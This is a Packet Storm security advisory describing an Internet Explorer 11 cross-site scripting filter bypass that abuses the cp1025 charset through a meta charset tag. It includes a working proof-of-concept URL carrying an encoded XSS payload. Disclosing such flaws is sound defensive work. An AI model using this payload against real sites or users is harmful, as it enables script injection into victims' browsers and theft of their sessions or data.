Microsoft Internet Explorer 11 suffers from a cross site scripting filter bypass vulnerability.
fa9a25ccb1840d327a7b15c7d2bf4c2f73c91940a80f05817225078bd17d4011#Vulnerability: IE 11 XSS Filter Bypass
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAInfoSec
#Website: http://rafayhackingarticles.net
#version: Latest
Description
Internet explorer 11 Suffers from a XSS Filter bypass using cp1025
charset. This is highly effective when the charset has not been set by
the webmaster.
The issue occurs due to the fact that in the regular expressions
authors are trying to filter "http-equiv" instead of filtering out the
"<meta charset" keyword.
Proof of Concept
The following is the Proof of concept:
http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed